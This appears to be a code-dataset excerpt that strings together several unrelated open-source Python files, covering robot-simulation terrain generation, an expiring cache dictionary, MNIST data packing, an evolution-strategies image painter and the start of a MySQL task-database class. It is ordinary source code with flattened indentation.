[ 240, 145, 135, 162 ],
[ 240, 145, 135, 163 ],
[ 240, 145, 135, 164 ],
[ 240, 145, 135, 165 ],
[ 240, 145, 135, 166 ],
[ 240, 145, 135, 167 ],
[ 240, 145, 135, 168 ],
[ 240, 145, 135, 169 ],
[ 240, 145, 135, 170 ],
[ 240, 145, 135, 171 ],
[ 240, 145, 135, 172 ],
[ 240, 145, 135, 173 ],
[ 240, 145, 135, 174 ],
[ 240, 145, 135, 175 ],
[ 240, 145, 135, 176 ],
[ 240, 145, 135, 177 ],
[ 240, 145, 135, 178 ],
[ 240, 145, 135, 179 ],
[ 240, 145, 135, 180 ],
[ 240, 145, 139, 176 ],
[ 240, 145, 139, 177 ],
[ 240, 145, 139, 178 ],
[ 240, 145, 139, 179 ],
[ 240, 145, 139, 180 ],
[ 240, 145, 139, 181 ],
[ 240, 145, 139, 182 ],
[ 240, 145, 139, 183 ],
[ 240, 145, 139, 184 ],
[ 240, 145, 139, 185 ],
[ 240, 145, 147, 144 ],
[ 240, 145, 147, 145 ],
[ 240, 145, 147, 146 ],
[ 240, 145, 147, 147 ],
[ 240, 145, 147, 148 ],
[ 240, 145, 147, 149 ],
[ 240, 145, 147, 150 ],
[ 240, 145, 147, 151 ],
[ 240, 145, 147, 152 ],
[ 240, 145, 147, 153 ],
[ 240, 145, 153, 144 ],
[ 240, 145, 153, 145 ],
[ 240, 145, 153, 146 ],
[ 240, 145, 153, 147 ],
[ 240, 145, 153, 148 ],
[ 240, 145, 153, 149 ],
[ 240, 145, 153, 150 ],
[ 240, 145, 153, 151 ],
[ 240, 145, 153, 152 ],
[ 240, 145, 153, 153 ],
[ 240, 145, 155, 128 ],
[ 240, 145, 155, 129 ],
[ 240, 145, 155, 130 ],
[ 240, 145, 155, 131 ],
[ 240, 145, 155, 132 ],
[ 240, 145, 155, 133 ],
[ 240, 145, 155, 134 ],
[ 240, 145, 155, 135 ],
[ 240, 145, 155, 136 ],
[ 240, 145, 155, 137 ],
[ 240, 145, 156, 176 ],
[ 240, 145, 156, 177 ],
[ 240, 145, 156, 178 ],
[ 240, 145, 156, 179 ],
[ 240, 145, 156, 180 ],
[ 240, 145, 156, 181 ],
[ 240, 145, 156, 182 ],
[ 240, 145, 156, 183 ],
[ 240, 145, 156, 184 ],
[ 240, 145, 156, 185 ],
[ 240, 145, 156, 186 ],
[ 240, 145, 156, 187 ],
[ 240, 145, 163, 160 ],
[ 240, 145, 163, 161 ],
[ 240, 145, 163, 162 ],
[ 240, 145, 163, 163 ],
[ 240, 145, 163, 164 ],
[ 240, 145, 163, 165 ],
[ 240, 145, 163, 166 ],
[ 240, 145, 163, 167 ],
[ 240, 145, 163, 168 ],
[ 240, 145, 163, 169 ],
[ 240, 145, 163, 170 ],
[ 240, 145, 163, 171 ],
[ 240, 145, 163, 172 ],
[ 240, 145, 163, 173 ],
[ 240, 145, 163, 174 ],
[ 240, 145, 163, 175 ],
[ 240, 145, 163, 176 ],
[ 240, 145, 163, 177 ],
[ 240, 145, 163, 178 ],
[ 240, 146, 144, 128 ],
[ 240, 146, 144, 129 ],
[ 240, 146, 144, 130 ],
[ 240, 146, 144, 131 ],
[ 240, 146, 144, 132 ],
[ 240, 146, 144, 133 ],
[ 240, 146, 144, 134 ],
[ 240, 146, 144, 135 ],
[ 240, 146, 144, 136 ],
[ 240, 146, 144, 137 ],
[ 240, 146, 144, 138 ],
[ 240, 146, 144, 139 ],
[ 240, 146, 144, 140 ],
[ 240, 146, 144, 141 ],
[ 240, 146, 144, 142 ],
[ 240, 146, 144, 143 ],
[ 240, 146, 144, 144 ],
[ 240, 146, 144, 145 ],
[ 240, 146, 144, 146 ],
[ 240, 146, 144, 147 ],
[ 240, 146, 144, 148 ],
[ 240, 146, 144, 149 ],
[ 240, 146, 144, 150 ],
[ 240, 146, 144, 151 ],
[ 240, 146, 144, 152 ],
[ 240, 146, 144, 153 ],
[ 240, 146, 144, 154 ],
[ 240, 146, 144, 155 ],
[ 240, 146, 144, 156 ],
[ 240, 146, 144, 157 ],
[ 240, 146, 144, 158 ],
[ 240, 146, 144, 159 ],
[ 240, 146, 144, 160 ],
[ 240, 146, 144, 161 ],
[ 240, 146, 144, 162 ],
[ 240, 146, 144, 163 ],
[ 240, 146, 144, 164 ],
[ 240, 146, 144, 165 ],
[ 240, 146, 144, 166 ],
[ 240, 146, 144, 167 ],
[ 240, 146, 144, 168 ],
[ 240, 146, 144, 169 ],
[ 240, 146, 144, 170 ],
[ 240, 146, 144, 171 ],
[ 240, 146, 144, 172 ],
[ 240, 146, 144, 173 ],
[ 240, 146, 144, 174 ],
[ 240, 146, 144, 175 ],
[ 240, 146, 144, 176 ],
[ 240, 146, 144, 177 ],
[ 240, 146, 144, 178 ],
[ 240, 146, 144, 179 ],
[ 240, 146, 144, 180 ],
[ 240, 146, 144, 181 ],
[ 240, 146, 144, 182 ],
[ 240, 146, 144, 183 ],
[ 240, 146, 144, 184 ],
[ 240, 146, 144, 185 ],
[ 240, 146, 144, 186 ],
[ 240, 146, 144, 187 ],
[ 240, 146, 144, 188 ],
[ 240, 146, 144, 189 ],
[ 240, 146, 144, 190 ],
[ 240, 146, 144, 191 ],
[ 240, 146, 145, 128 ],
[ 240, 146, 145, 129 ],
[ 240, 146, 145, 130 ],
[ 240, 146, 145, 131 ],
[ 240, 146, 145, 132 ],
[ 240, 146, 145, 133 ],
[ 240, 146, 145, 134 ],
[ 240, 146, 145, 135 ],
[ 240, 146, 145, 136 ],
[ 240, 146, 145, 137 ],
[ 240, 146, 145, 138 ],
[ 240, 146, 145, 139 ],
[ 240, 146, 145, 140 ],
[ 240, 146, 145, 141 ],
[ 240, 146, 145, 142 ],
[ 240, 146, 145, 143 ],
[ 240, 146, 145, 144 ],
[ 240, 146, 145, 145 ],
[ 240, 146, 145, 146 ],
[ 240, 146, 145, 147 ],
[ 240, 146, 145, 148 ],
[ 240, 146, 145, 149 ],
[ 240, 146, 145, 150 ],
[ 240, 146, 145, 151 ],
[ 240, 146, 145, 152 ],
[ 240, 146, 145, 153 ],
[ 240, 146, 145, 154 ],
[ 240, 146, 145, 155 ],
[ 240, 146, 145, 156 ],
[ 240, 146, 145, 157 ],
[ 240, 146, 145, 158 ],
[ 240, 146, 145, 159 ],
[ 240, 146, 145, 160 ],
[ 240, 146, 145, 161 ],
[ 240, 146, 145, 162 ],
[ 240, 146, 145, 163 ],
[ 240, 146, 145, 164 ],
[ 240, 146, 145, 165 ],
[ 240, 146, 145, 166 ],
[ 240, 146, 145, 167 ],
[ 240, 146, 145, 168 ],
[ 240, 146, 145, 169 ],
[ 240, 146, 145, 170 ],
[ 240, 146, 145, 171 ],
[ 240, 146, 145, 172 ],
[ 240, 146, 145, 173 ],
[ 240, 146, 145, 174 ],
[ 240, 150, 169, 160 ],
[ 240, 150, 169, 161 ],
[ 240, 150, 169, 162 ],
[ 240, 150, 169, 163 ],
[ 240, 150, 169, 164 ],
[ 240, 150, 169, 165 ],
[ 240, 150, 169, 166 ],
[ 240, 150, 169, 167 ],
[ 240, 150, 169, 168 ],
[ 240, 150, 169, 169 ],
[ 240, 150, 173, 144 ],
[ 240, 150, 173, 145 ],
[ 240, 150, 173, 146 ],
[ 240, 150, 173, 147 ],
[ 240, 150, 173, 148 ],
[ 240, 150, 173, 149 ],
[ 240, 150, 173, 150 ],
[ 240, 150, 173, 151 ],
[ 240, 150, 173, 152 ],
[ 240, 150, 173, 153 ],
[ 240, 150, 173, 155 ],
[ 240, 150, 173, 156 ],
[ 240, 150, 173, 157 ],
[ 240, 150, 173, 158 ],
[ 240, 150, 173, 159 ],
[ 240, 150, 173, 160 ],
[ 240, 150, 173, 161 ],
[ 240, 157, 141, 160 ],
[ 240, 157, 141, 161 ],
[ 240, 157, 141, 162 ],
[ 240, 157, 141, 163 ],
[ 240, 157, 141, 164 ],
[ 240, 157, 141, 165 ],
[ 240, 157, 141, 166 ],
[ 240, 157, 141, 167 ],
[ 240, 157, 141, 168 ],
[ 240, 157, 141, 169 ],
[ 240, 157, 141, 170 ],
[ 240, 157, 141, 171 ],
[ 240, 157, 141, 172 ],
[ 240, 157, 141, 173 ],
[ 240, 157, 141, 174 ],
[ 240, 157, 141, 175 ],
[ 240, 157, 141, 176 ],
[ 240, 157, 141, 177 ],
[ 240, 157, 159, 142 ],
[ 240, 157, 159, 143 ],
[ 240, 157, 159, 144 ],
[ 240, 157, 159, 145 ],
[ 240, 157, 159, 146 ],
[ 240, 157, 159, 147 ],
[ 240, 157, 159, 148 ],
[ 240, 157, 159, 149 ],
[ 240, 157, 159, 150 ],
[ 240, 157, 159, 151 ],
[ 240, 157, 159, 152 ],
[ 240, 157, 159, 153 ],
[ 240, 157, 159, 154 ],
[ 240, 157, 159, 155 ],
[ 240, 157, 159, 156 ],
[ 240, 157, 159, 157 ],
[ 240, 157, 159, 158 ],
[ 240, 157, 159, 159 ],
[ 240, 157, 159, 160 ],
[ 240, 157, 159, 161 ],
[ 240, 157, 159, 162 ],
[ 240, 157, 159, 163 ],
[ 240, 157, 159, 164 ],
[ 240, 157, 159, 165 ],
[ 240, 157, 159, 166 ],
[ 240, 157, 159, 167 ],
[ 240, 157, 159, 168 ],
[ 240, 157, 159, 169 ],
[ 240, 157, 159, 170 ],
[ 240, 157, 159, 171 ],
[ 240, 157, 159, 172 ],
[ 240, 157, 159, 173 ],
[ 240, 157, 159, 174 ],
[ 240, 157, 159, 175 ],
[ 240, 157, 159, 176 ],
[ 240, 157, 159, 177 ],
[ 240, 157, 159, 178 ],
[ 240, 157, 159, 179 ],
[ 240, 157, 159, 180 ],
[ 240, 157, 159, 181 ],
[ 240, 157, 159, 182 ],
[ 240, 157, 159, 183 ],
[ 240, 157, 159, 184 ],
[ 240, 157, 159, 185 ],
[ 240, 157, 159, 186 ],
[ 240, 157, 159, 187 ],
[ 240, 157, 159, 188 ],
[ 240, 157, 159, 189 ],
[ 240, 157, 159, 190 ],
[ 240, 157, 159, 191 ],
[ 240, 158, 163, 135 ],
[ 240, 158, 163, 136 ],
[ 240, 158, 163, 137 ],
[ 240, 158, 163, 138 ],
[ 240, 158, 163, 139 ],
[ 240, 158, 163, 140 ],
[ 240, 158, 163, 141 ],
[ 240, 158, 163, 142 ],
[ 240, 158, 163, 143 ],
[ 240, 159, 132, 128 ],
[ 240, 159, 132, 129 ],
[ 240, 159, 132, 130 ],
[ 240, 159, 132, 131 ],
[ 240, 159, 132, 132 ],
[ 240, 159, 132, 133 ],
[ 240, 159, 132, 134 ],
[ 240, 159, 132, 135 ],
[ 240, 159, 132, 136 ],
[ 240, 159, 132, 137 ],
[ 240, 159, 132, 138 ],
[ 240, 159, 132, 139 ],
[ 240, 159, 132, 140 ] ]
|
rex_gym/model/terrain.py
|
y-prudent/rex-gym
| 827 |
75266
|
<reponame>y-prudent/rex-gym
# Original script: https://github.com/bulletphysics/bullet3/blob/master/examples/pybullet/examples/heightfield.py
import pybullet_data as pd
import rex_gym.util.pybullet_data as rpd
import pybullet as p
import random
from rex_gym.util import flag_mapper
FLAG_TO_FILENAME = {
'mounts': "heightmaps/wm_height_out.png",
'maze': "heightmaps/Maze.png"
}
ROBOT_INIT_POSITION = {
'mounts': [0, 0, .85],
'plane': [0, 0, 0.21],
'hills': [0, 0, 1.98],
'maze': [0, 0, 0.21],
'random': [0, 0, 0.21]
}
class Terrain:
def __init__(self, terrain_source, terrain_id, columns=256, rows=256):
random.seed(10)
self.terrain_source = terrain_source
self.terrain_id = terrain_id
self.columns = columns
self.rows = rows
def generate_terrain(self, env, height_perturbation_range=0.05):
env.pybullet_client.setAdditionalSearchPath(pd.getDataPath())
env.pybullet_client.configureDebugVisualizer(env.pybullet_client.COV_ENABLE_RENDERING, 0)
height_perturbation_range = height_perturbation_range
terrain_data = [0] * self.columns * self.rows
if self.terrain_source == 'random':
for j in range(int(self.columns / 2)):
for i in range(int(self.rows / 2)):
height = random.uniform(0, height_perturbation_range)
terrain_data[2 * i + 2 * j * self.rows] = height
terrain_data[2 * i + 1 + 2 * j * self.rows] = height
terrain_data[2 * i + (2 * j + 1) * self.rows] = height
terrain_data[2 * i + 1 + (2 * j + 1) * self.rows] = height
terrain_shape = env.pybullet_client.createCollisionShape(
shapeType=env.pybullet_client.GEOM_HEIGHTFIELD,
meshScale=[.05, .05, 1],
heightfieldTextureScaling=(self.rows - 1) / 2,
heightfieldData=terrain_data,
numHeightfieldRows=self.rows,
numHeightfieldColumns=self.columns)
terrain = env.pybullet_client.createMultiBody(0, terrain_shape)
env.pybullet_client.resetBasePositionAndOrientation(terrain, [0, 0, 0], [0, 0, 0, 1])
if self.terrain_source == 'csv':
terrain_shape = env.pybullet_client.createCollisionShape(
shapeType=env.pybullet_client.GEOM_HEIGHTFIELD,
meshScale=[.5, .5, .5],
fileName="heightmaps/ground0.txt",
heightfieldTextureScaling=128)
terrain = env.pybullet_client.createMultiBody(0, terrain_shape)
textureId = env.pybullet_client.loadTexture(f"{rpd.getDataPath()}/grass.png")
env.pybullet_client.changeVisualShape(terrain, -1, textureUniqueId=textureId)
env.pybullet_client.resetBasePositionAndOrientation(terrain, [1, 0, 2], [0, 0, 0, 1])
# TODO do this better..
if self.terrain_source == 'png':
terrain_shape = env.pybullet_client.createCollisionShape(
shapeType=env.pybullet_client.GEOM_HEIGHTFIELD,
meshScale=[.1, .1, 24 if self.terrain_id == "mounts" else 1],
fileName=FLAG_TO_FILENAME[self.terrain_id])
terrain = env.pybullet_client.createMultiBody(0, terrain_shape)
if self.terrain_id == "mounts":
textureId = env.pybullet_client.loadTexture("heightmaps/gimp_overlay_out.png")
env.pybullet_client.changeVisualShape(terrain, -1, textureUniqueId=textureId)
env.pybullet_client.resetBasePositionAndOrientation(terrain, [0, 0, 2], [0, 0, 0, 1])
else:
env.pybullet_client.resetBasePositionAndOrientation(terrain, [0, 0, 0], [0, 0, 0, 1])
self.terrain_shape = terrain_shape
env.pybullet_client.changeVisualShape(terrain, -1, rgbaColor=[1, 1, 1, 1])
# env.pybullet_client.configureDebugVisualizer(env.pybullet_client.COV_ENABLE_RENDERING, 1)
def update_terrain(self, height_perturbation_range=0.05):
if self.terrain_source == flag_mapper.TERRAIN_TYPE['random']:
terrain_data = [0] * self.columns * self.rows
for j in range(int(self.columns / 2)):
for i in range(int(self.rows / 2)):
height = random.uniform(0, height_perturbation_range)
terrain_data[2 * i + 2 * j * self.rows] = height
terrain_data[2 * i + 1 + 2 * j * self.rows] = height
terrain_data[2 * i + (2 * j + 1) * self.rows] = height
terrain_data[2 * i + 1 + (2 * j + 1) * self.rows] = height
# GEOM_CONCAVE_INTERNAL_EDGE may help avoid getting stuck at an internal (shared) edge of
# the triangle/heightfield. GEOM_CONCAVE_INTERNAL_EDGE is a bit slower to build though.
flags = p.GEOM_CONCAVE_INTERNAL_EDGE
# flags = 0
self.terrain_shape = p.createCollisionShape(
shapeType=p.GEOM_HEIGHTFIELD,
flags=flags,
meshScale=[.05, .05, 1],
heightfieldTextureScaling=(self.rows - 1) / 2,
heightfieldData=terrain_data,
numHeightfieldRows=self.rows,
numHeightfieldColumns=self.columns,
replaceHeightfieldIndex=self.terrain_shape)
|
expiringdict/__init__.py
|
jonnyyu/expiringdict
| 294 |
75274
|
<gh_stars>100-1000
"""
Dictionary with auto-expiring values for caching purposes.
Expiration happens on any access, object is locked during cleanup from expired
values. Can not store more than max_len elements - the oldest will be deleted.
>>> ExpiringDict(max_len=100, max_age_seconds=10)
The values stored in the following way:
{
key1: (value1, created_time1),
key2: (value2, created_time2)
}
NOTE: iteration over dict and also keys() do not remove expired values!
"""
import time
from threading import RLock
import sys
from typing import Any, Union
try:
from collections import OrderedDict
except ImportError:
# Python < 2.7
from ordereddict import OrderedDict
class ExpiringDict(OrderedDict):
def __init__(self, max_len, max_age_seconds, items=None):
# type: (Union[int, None], Union[float, None], Union[None,dict,OrderedDict,ExpiringDict]) -> None
if not self.__is_instance_of_expiring_dict(items):
self.__assertions(max_len, max_age_seconds)
OrderedDict.__init__(self)
self.max_len = max_len
self.max_age = max_age_seconds
self.lock = RLock()
if sys.version_info >= (3, 5):
self._safe_keys = lambda: list(self.keys())
else:
self._safe_keys = self.keys
if items is not None:
if self.__is_instance_of_expiring_dict(items):
self.__copy_expiring_dict(max_len, max_age_seconds, items)
elif self.__is_instance_of_dict(items):
self.__copy_dict(items)
elif self.__is_reduced_result(items):
self.__copy_reduced_result(items)
else:
raise ValueError('can not unpack items')
def __contains__(self, key):
""" Return True if the dict has a key, else return False. """
try:
with self.lock:
item = OrderedDict.__getitem__(self, key)
if time.time() - item[1] < self.max_age:
return True
else:
del self[key]
except KeyError:
pass
return False
def __getitem__(self, key, with_age=False):
""" Return the item of the dict.
Raises a KeyError if key is not in the map.
"""
with self.lock:
item = OrderedDict.__getitem__(self, key)
item_age = time.time() - item[1]
if item_age < self.max_age:
if with_age:
return item[0], item_age
else:
return item[0]
else:
del self[key]
raise KeyError(key)
def __setitem__(self, key, value, set_time=None):
""" Set d[key] to value. """
with self.lock:
if len(self) == self.max_len:
if key in self:
del self[key]
else:
try:
self.popitem(last=False)
except KeyError:
pass
if set_time is None:
set_time = time.time()
OrderedDict.__setitem__(self, key, (value, set_time))
def pop(self, key, default=None):
""" Get item from the dict and remove it.
Return default if expired or does not exist. Never raise KeyError.
"""
with self.lock:
try:
item = OrderedDict.__getitem__(self, key)
del self[key]
return item[0]
except KeyError:
return default
def ttl(self, key):
""" Return TTL of the `key` (in seconds).
Returns None for non-existent or expired keys.
"""
key_value, key_age = self.get(key, with_age=True) # type: Any, Union[None, float]
if key_age:
key_ttl = self.max_age - key_age
if key_ttl > 0:
return key_ttl
return None
def get(self, key, default=None, with_age=False):
""" Return the value for key if key is in the dictionary, else default. """
try:
return self.__getitem__(key, with_age)
except KeyError:
if with_age:
return default, None
else:
return default
def items(self):
""" Return a copy of the dictionary's list of (key, value) pairs. """
r = []
for key in self._safe_keys():
try:
r.append((key, self[key]))
except KeyError:
pass
return r
def items_with_timestamp(self):
""" Return a copy of the dictionary's list of (key, value, timestamp) triples. """
r = []
for key in self._safe_keys():
try:
r.append((key, OrderedDict.__getitem__(self, key)))
except KeyError:
pass
return r
def values(self):
""" Return a copy of the dictionary's list of values.
See the note for dict.items(). """
r = []
for key in self._safe_keys():
try:
r.append(self[key])
except KeyError:
pass
return r
def fromkeys(self):
""" Create a new dictionary with keys from seq and values set to value. """
raise NotImplementedError()
def iteritems(self):
""" Return an iterator over the dictionary's (key, value) pairs. """
raise NotImplementedError()
def itervalues(self):
""" Return an iterator over the dictionary's values. """
raise NotImplementedError()
def viewitems(self):
""" Return a new view of the dictionary's items ((key, value) pairs). """
raise NotImplementedError()
def viewkeys(self):
""" Return a new view of the dictionary's keys. """
raise NotImplementedError()
def viewvalues(self):
""" Return a new view of the dictionary's values. """
raise NotImplementedError()
def __reduce__(self):
reduced = self.__class__, (self.max_len, self.max_age, ('reduce_result', self.items_with_timestamp()))
return reduced
def __assertions(self, max_len, max_age_seconds):
self.__assert_max_len(max_len)
self.__assert_max_age_seconds(max_age_seconds)
@staticmethod
def __assert_max_len(max_len):
assert max_len >= 1
@staticmethod
def __assert_max_age_seconds(max_age_seconds):
assert max_age_seconds >= 0
@staticmethod
def __is_reduced_result(items):
if len(items) == 2 and items[0] == 'reduce_result':
return True
return False
@staticmethod
def __is_instance_of_expiring_dict(items):
if items is not None:
if isinstance(items, ExpiringDict):
return True
return False
@staticmethod
def __is_instance_of_dict(items):
if isinstance(items, dict):
return True
return False
def __copy_expiring_dict(self, max_len, max_age_seconds, items):
# type: (Union[int, None], Union[float, None], Any) -> None
if max_len is not None:
self.__assert_max_len(max_len)
self.max_len = max_len
else:
self.max_len = items.max_len
if max_age_seconds is not None:
self.__assert_max_age_seconds(max_age_seconds)
self.max_age = max_age_seconds
else:
self.max_age = items.max_age
[self.__setitem__(key, value, set_time) for key, (value, set_time) in items.items_with_timestamp()]
def __copy_dict(self, items):
# type: (dict) -> None
[self.__setitem__(key, value) for key, value in items.items()]
def __copy_reduced_result(self, items):
[self.__setitem__(key, value, set_time) for key, (value, set_time) in items[1]]
|
mnist/mnist.py
|
Calysto/conx-data
| 105 |
75275
|
import h5py
import numpy as np
from keras.datasets import mnist
from keras.utils import to_categorical
# input image dimensions
img_rows, img_cols = 28, 28
# the data, shuffled and split between train and test sets
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)
x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)
input_shape = (img_rows, img_cols, 1)
x_train = x_train.astype('float16')
x_test = x_test.astype('float16')
inputs = np.concatenate((x_train,x_test)) / 255
labels = np.concatenate((y_train,y_test)) # ints, 0 to 10
###########################################
# fix mis-labeled image(s) in Keras dataset
labels[10994] = 9
###########################################
targets = to_categorical(labels).astype("uint8")
string = h5py.special_dtype(vlen=str)
labels = np.array([str(label) for label in labels], dtype=string)
print("creating h5...")
with h5py.File("mnist.h5", "w") as h5:
dset = h5.create_dataset('inputs', data=[inputs], compression='gzip', compression_opts=9)
dset = h5.create_dataset('targets', data=[targets], compression='gzip', compression_opts=9)
dset = h5.create_dataset('labels', data=[labels], compression='gzip', compression_opts=9)
print("done!")
|
es-clip/es_bitmap.py
|
daia99/brain-tokyo-workshop
| 1,097 |
75278
|
<filename>es-clip/es_bitmap.py
#!/usr/bin/env python3
import os
os.environ['OPENBLAS_NUM_THREADS'] = '1'
os.environ['OMP_NUM_THREADS'] = '1'
import argparse
import cProfile
import json
import multiprocessing as mp
import os
import re
import numpy as np
from PIL import Image
from pgpelib import PGPE
from utils import (img2arr, arr2img, rgba2rgb, save_as_png, EasyDict)
from painter import TrianglesPainter
from es import (get_tell_fn, get_best_params_fn, PrintStepHook, PrintCostHook, SaveCostHook, StoreImageHook, ShowImageHook)
def parse_cmd_args():
parser = argparse.ArgumentParser()
parser.add_argument('--out_dir', type=str, default='es_bitmap_out')
parser.add_argument('--height', type=int, default=200, help='Height of the canvas. -1 for inference.')
parser.add_argument('--width', type=int, default=-1, help='Width of the canvas. -1 for inference.')
parser.add_argument('--target_fn', type=str, required=True)
parser.add_argument('--n_triangle', type=int, default=50)
parser.add_argument('--loss_type', type=str, default='l2')
parser.add_argument('--alpha_scale', type=float, default=0.5)
parser.add_argument('--coordinate_scale', type=float, default=1.0)
parser.add_argument('--fps', type=int, default=12)
parser.add_argument('--n_population', type=int, default=256)
parser.add_argument('--n_iterations', type=int, default=10000)
parser.add_argument('--mp_batch_size', type=int, default=1)
parser.add_argument('--solver', type=str, default='pgpe', choices=['pgpe'])
parser.add_argument('--report_interval', type=int, default=50)
parser.add_argument('--step_report_interval', type=int, default=50)
parser.add_argument('--save_as_gif_interval', type=int, default=50)
parser.add_argument('--profile', type=bool, default=False)
cmd_args = parser.parse_args()
return cmd_args
def parse_args(cmd_args):
args = EasyDict()
args.out_dir = cmd_args.out_dir
args.height = cmd_args.height
args.width = cmd_args.width
args.target_fn = cmd_args.target_fn
args.n_triangle = cmd_args.n_triangle
args.loss_type = cmd_args.loss_type
args.alpha_scale = cmd_args.alpha_scale
args.coordinate_scale = cmd_args.coordinate_scale
args.fps = cmd_args.fps
args.n_population = cmd_args.n_population
args.n_iterations = cmd_args.n_iterations
args.mp_batch_size = cmd_args.mp_batch_size
args.solver = cmd_args.solver
args.report_interval = cmd_args.report_interval
args.step_report_interval = cmd_args.step_report_interval
args.save_as_gif_interval = cmd_args.save_as_gif_interval
args.profile = cmd_args.profile
return args
def pre_training_loop(args):
out_dir = args.out_dir
os.makedirs(out_dir, exist_ok=True)
assert os.path.isdir(out_dir)
prev_ids = [re.match(r'^\d+', fn) for fn in os.listdir(out_dir)]
new_id = 1 + max([-1] + [int(id_.group()) if id_ else -1 for id_ in prev_ids])
desc = f'{os.path.splitext(os.path.basename(args.target_fn))[0]}-' \
f'{args.n_triangle}-triangles-' \
f'{args.n_iterations}-iterations-' \
f'{args.n_population}-population-' \
f'{args.solver}-solver-' \
f'{args.loss_type}-loss'
args.working_dir = os.path.join(out_dir, f'{new_id:04d}-{desc}')
os.makedirs(args.working_dir)
args_dump_fn = os.path.join(args.working_dir, 'args.json')
with open(args_dump_fn, 'w') as f:
json.dump(args, f, indent=4)
def load_target(fn, resize):
img = Image.open(fn)
img = rgba2rgb(img)
h, w = resize
img = img.resize((w, h), Image.LANCZOS)
img_arr = img2arr(img)
return img_arr
def fitness_fn(params, painter, target_arr, loss_type):
NUM_ROLLOUTS = 5
losses = []
for _ in range(NUM_ROLLOUTS):
rendered_arr = painter.render(params)
rendered_arr_rgb = rendered_arr[..., :3]
rendered_arr_rgb = rendered_arr_rgb.astype(np.float32) / 255.
target_arr_rgb = target_arr[..., :3]
target_arr_rgb = target_arr_rgb.astype(np.float32) / 255.
if loss_type == 'l2':
pixelwise_l2_loss = (rendered_arr_rgb - target_arr_rgb)**2
l2_loss = pixelwise_l2_loss.mean()
loss = l2_loss
elif loss_type == 'l1':
pixelwise_l1_loss = np.abs(rendered_arr_rgb - target_arr_rgb)
l1_loss = pixelwise_l1_loss.mean()
loss = l1_loss
else:
raise ValueError(f'Unsupported loss type \'{loss_type}\'')
losses.append(loss)
return -np.mean(losses) # pgpe *maximizes*
worker_assets = None
def init_worker(painter, target_arr, loss_type):
global worker_assets
worker_assets = {'painter': painter, 'target_arr': target_arr, 'loss_type': loss_type}
def fitness_fn_by_worker(params):
global worker_assets
painter = worker_assets['painter']
target_arr = worker_assets['target_arr']
loss_type = worker_assets['loss_type']
return fitness_fn(params, painter, target_arr, loss_type)
def batch_fitness_fn_by_workers(params_batch):
return [fitness_fn_by_worker(params) for params in params_batch]
def infer_height_and_width(hint_height, hint_width, fn):
fn_width, fn_height = Image.open(fn).size
if hint_height <= 0:
if hint_width <= 0:
inferred_height, inferred_width = fn_height, fn_width # use target image's size
else: # hint_width is valid
inferred_width = hint_width
inferred_height = hint_width * fn_height // fn_width
else: # hint_height is valid
if hint_width <= 0:
inferred_height = hint_height
inferred_width = hint_height * fn_width // fn_height
else: # hint_width is valid
inferred_height, inferred_width = hint_height, hint_width # use hint size
print(f'Inferring height and width. '
f'Hint: {hint_height, hint_width}, File: {fn_width, fn_height}, Inferred: {inferred_height, inferred_width}')
return inferred_height, inferred_width
def training_loop(args):
height, width = infer_height_and_width(args.height, args.width, args.target_fn)
painter = TrianglesPainter(
h=height,
w=width,
n_triangle=args.n_triangle,
alpha_scale=args.alpha_scale,
coordinate_scale=args.coordinate_scale,
)
target_arr = load_target(args.target_fn, (height, width))
save_as_png(os.path.join(args.working_dir, 'target'), arr2img(target_arr))
hooks = [
(args.step_report_interval, PrintStepHook()),
(args.report_interval, PrintCostHook()),
(args.report_interval, SaveCostHook(save_fp=os.path.join(args.working_dir, 'cost.txt'))),
(
args.report_interval,
StoreImageHook(
render_fn=lambda params: painter.render(params, background='white'),
save_fp=os.path.join(args.working_dir, 'animate-background=white'),
fps=args.fps,
save_interval=args.save_as_gif_interval,
),
),
(args.report_interval, ShowImageHook(render_fn=lambda params: painter.render(params, background='white'))),
]
allowed_solver = ['pgpe']
if args.solver not in allowed_solver:
raise ValueError(f'Only following solver(s) is/are supported: {allowed_solver}')
solver = None
if args.solver == 'pgpe':
solver = PGPE(
solution_length=painter.n_params,
popsize=args.n_population,
optimizer='clipup',
optimizer_config={'max_speed': 0.15},
)
else:
raise ValueError()
tell_fn = get_tell_fn(args.solver)
best_params_fn = get_best_params_fn(args.solver)
loss_type = args.loss_type
# fitnesses_fn is OK to be inefficient as it's for hook's use only.
fitnesses_fn = lambda fitness_fn, solutions: [fitness_fn(_, painter, target_arr, loss_type) for _ in solutions]
n_iterations = args.n_iterations
mp_batch_size = args.mp_batch_size
proc_pool = mp.Pool(processes=mp.cpu_count(), initializer=init_worker, initargs=(painter, target_arr, loss_type))
for i in range(1, 1 + n_iterations):
solutions = solver.ask()
batch_it = (solutions[start:start + mp_batch_size] for start in range(0, len(solutions), mp_batch_size))
batch_output = proc_pool.imap(func=batch_fitness_fn_by_workers, iterable=batch_it)
fitnesses = [item for batch in batch_output for item in batch]
tell_fn(solver, solutions, fitnesses)
for hook in hooks:
trigger_itervel, hook_fn_or_obj = hook
if i % trigger_itervel == 0:
hook_fn_or_obj(i, solver, fitness_fn, fitnesses_fn, best_params_fn)
for hook in hooks:
_, hook_fn_or_obj = hook
if hasattr(hook_fn_or_obj, 'close') and callable(hook_fn_or_obj.close):
hook_fn_or_obj.close()
proc_pool.close()
proc_pool.join()
def main():
cmd_args = parse_cmd_args()
args = parse_args(cmd_args)
pre_training_loop(args)
if args.profile:
cProfile.runctx('training_loop(args)', globals(), locals(), sort='cumulative')
else:
training_loop(args)
if __name__ == "__main__":
mp.set_start_method('spawn')
main()
|
pyspider/database/mysql/taskdb.py
|
zgwcome/pyspider
| 13,935 |
75307
|
#!/usr/bin/envutils
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<<EMAIL>>
# http://binux.me
# Created on 2014-07-17 18:53:01
import re
import six
import time
import json
import mysql.connector
from pyspider.libs import utils
from pyspider.database.base.taskdb import TaskDB as BaseTaskDB
from pyspider.database.basedb import BaseDB
from .mysqlbase import MySQLMixin, SplitTableMixin
class TaskDB(MySQLMixin, SplitTableMixin, BaseTaskDB, BaseDB):
__tablename__ = ''
def __init__(self, host='localhost', port=3306, database='taskdb',
user='root', passwd=<PASSWORD>):
self.database_name = database
self.conn = mysql.connector.connect(user=user, password=<PASSWORD>,
host=host, port=port, autocommit=True)
if database not in [x[0] for x in self._execute('show databases')]:
self._execute('CREATE DATABASE %s' % self.escape(database))
self.conn.database = database
self._list_project()
